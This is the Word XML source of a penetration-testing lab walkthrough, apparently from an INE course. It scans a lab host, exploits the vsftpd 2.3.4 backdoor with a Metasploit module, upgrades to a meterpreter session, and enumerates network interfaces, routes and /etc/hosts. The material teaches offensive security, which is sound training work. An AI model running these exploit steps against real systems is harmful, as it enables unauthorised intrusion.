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DAD3" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00140519">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB5A5C5" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:t>In this lab environment, you will be provided with GUI access to a Kali machine. The target machine will be accessible at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00140519">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00140519">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A55D98" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objective:</w:t>
      </w:r>
      <w:r w:rsidRPr="00140519">
        <w:t> Enumerate the target machine to gather network information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F8D6D3" w14:textId="431AFE3E" w:rsidR="00853ABF" w:rsidRDefault="00140519">
      <w:r>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2208DA65" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00140519">
        <w:t> Open the lab link to access the Kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AF1FFE" w14:textId="418CFE48" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40B3F514" wp14:editId="7BE939DB">
            <wp:extent cx="5943600" cy="3239135"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="953429483" name="Picture 2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239135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="016B422C" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="00140519">
        <w:t> Port scanning with Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD63EDF" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:t>Perform a port scan to identify vulnerable services running on the target system. This can be done by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58369CEB" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422ED9A5" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00140519">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00140519">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00140519">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00140519">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00140519">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1A607140" w14:textId="07D82F84" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52CDCABE" wp14:editId="089FF791">
            <wp:extent cx="5943600" cy="2301875"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1965961774" name="Picture 2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301875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E563B8" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:t xml:space="preserve">The Nmap scan reveals that the target has an FTP server running on port 21. The version column from the Nmap scan reveals that the FTP server is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00140519">
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00140519">
        <w:t xml:space="preserve"> 2.3.4. This version of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00140519">
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00140519">
        <w:t xml:space="preserve"> is vulnerable to a backdoor command execution vulnerability and can be exploited with a Metasploit module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2F378C" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3:</w:t>
      </w:r>
      <w:r w:rsidRPr="00140519">
        <w:t> Gaining access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D72EE6B" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:t>Now that we have identified the vulnerable service running on the target, we can start the Metasploit Framework console (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00140519">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00140519">
        <w:t>) and run the exploit module by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D316E4B" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C60EA8C" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00140519">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00140519">
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D12B248" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:t>use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00140519">
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00140519">
        <w:t>/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514E618D" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:t xml:space="preserve">set RHOSTS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00140519">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="47013F8E" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F0028E" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339EBE81" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="00140519">
        <w:t> If the exploit didn't work on the first try, run the exploit again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFF2830" w14:textId="469252CA" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BE7C9FE" wp14:editId="13719CFB">
            <wp:extent cx="5943600" cy="2475230"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="1586120654" name="Picture 2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75230"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B5A4A9" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:t xml:space="preserve">You can also obtain a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00140519">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00140519">
        <w:t xml:space="preserve"> session on the target system by upgrading the command shell session. This can be done by running the following commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717ABE89" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:t>(Put the current session in the background.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEC7121" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BCAD11" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:t>CTRL + Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12485A38" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:t>sessions -u 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB9BF2D" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:t>sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE82152" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:t>sessions -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00140519">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00140519">
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70535048" w14:textId="6D2C134E" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="463CEF7D" wp14:editId="315E8DC5">
            <wp:extent cx="5943600" cy="2831465"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="1749462157" name="Picture 1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nten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31465"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="473BBFFC" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="00140519">
        <w:t> Enumerating network information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A40FAB1" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Now that we have gained access to the target system and have obtained a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00140519">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00140519">
        <w:t xml:space="preserve"> session, we can begin enumerating network information from the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DE3178" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:t xml:space="preserve">The first piece of information that we can enumerate is the list of network interfaces connected to the target system and their respective IP addresses, this can be done by running the following </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00140519">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00140519">
        <w:t xml:space="preserve"> command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1C81EA" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB0C61F" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00140519">
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="04AD847B" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:t>As shown in the following screenshot, the target system has one physical interface (eth0)</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00140519">
        <w:t xml:space="preserve"> a loopback</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00140519">
        <w:t xml:space="preserve"> interface (lo) for local connections and a virtual interface (ip_vti0).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC027C5" w14:textId="03E272CE" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2ABC5C90" wp14:editId="0C8DA779">
            <wp:extent cx="5943600" cy="4988560"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="1180051188"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onten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988560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C2762C" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:t xml:space="preserve">We can get a list of open ports on the target system by running the following </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00140519">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00140519">
        <w:t xml:space="preserve"> command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143C6C60" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D16520C" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:t>netstat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5698E3" w14:textId="02FE4A74" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1737C519" wp14:editId="2B4EE400">
            <wp:extent cx="5943600" cy="2224405"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="550336899" name="Picture 1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onten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24405"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7134001F" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:t>Another important piece of information to obtain is the routing table, this can be done by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F5A649" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F936A1" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:t>route</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B19EEB" w14:textId="387851FB" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5191202E" wp14:editId="7770ABB6">
            <wp:extent cx="5943600" cy="2250440"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1592355518"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ontent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50440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="742A94CE" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:t>As shown in the preceding screenshot, this will give you an idea of all the routes available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209B915B" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:t>This information can also be gathered manually by spawning a shell session and running the following commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2426E7" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F53367" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:t>background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC1B4D5" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:t>sessions -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00140519">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00140519">
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4334FC" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:lastRenderedPageBreak/>
        <w:t>/bin/bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00140519">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7C5466B5" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00140519">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00140519">
        <w:t xml:space="preserve"> a s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF532AD" w14:textId="32279B82" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="478C6538" wp14:editId="16F0B4A5">
            <wp:extent cx="5943600" cy="3001645"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="376053988" name="Picture 1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01645"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A5F9AD" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:t>As shown in the preceding screenshot, this command will display the list of network interfaces connected to the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B685216" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:t>We can also enumerate the list of configured networks and their subnets by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C221A17" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734FC72F" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:t>cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00140519">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00140519">
        <w:t>/networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56994664" w14:textId="4F79858D" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7013ED62" wp14:editId="391AAD5C">
            <wp:extent cx="5943600" cy="1672590"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="1301570105" name="Picture 1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onten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72590"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="512E4EF5" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:t>Most importantly, we can enumerate the list of locally mapped domains and their respective IP addresses by displaying the content of the /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00140519">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00140519">
        <w:t>/hosts file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7897E4AB" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762C61E3" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:lastRenderedPageBreak/>
        <w:t>cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00140519">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00140519">
        <w:t>/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB445B7" w14:textId="488D883E" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4786B2DA" wp14:editId="0180E2E8">
            <wp:extent cx="5943600" cy="2659380"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1559005484" name="Picture 1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ntent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61E347E2" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:proofErr w:type="gramStart"/>
